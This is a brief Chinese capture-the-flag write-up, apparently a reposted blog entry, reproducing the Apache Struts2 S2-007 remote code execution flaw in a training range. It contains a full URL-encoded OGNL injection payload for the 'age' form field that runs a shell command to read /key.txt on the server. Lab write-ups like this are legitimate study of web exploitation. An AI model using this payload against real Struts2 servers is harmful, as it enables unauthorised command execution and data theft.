您的位置:首页 > 运维架构 > Apache

墨者学院_Apache Struts2远程代码执行漏洞(S2-007)复现

2019-08-26 09:02 330 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/cc_de_csdn/article/details/100070897
  1. 打开靶场,任意填写表单并提交
  2. 使用BrupSuite捕获报文
  3. 修改age的值为:
  4. %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat /key.txt%27%29.getInputStream%28%29%29%29+%2B+%27
  5. 得到KEY
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: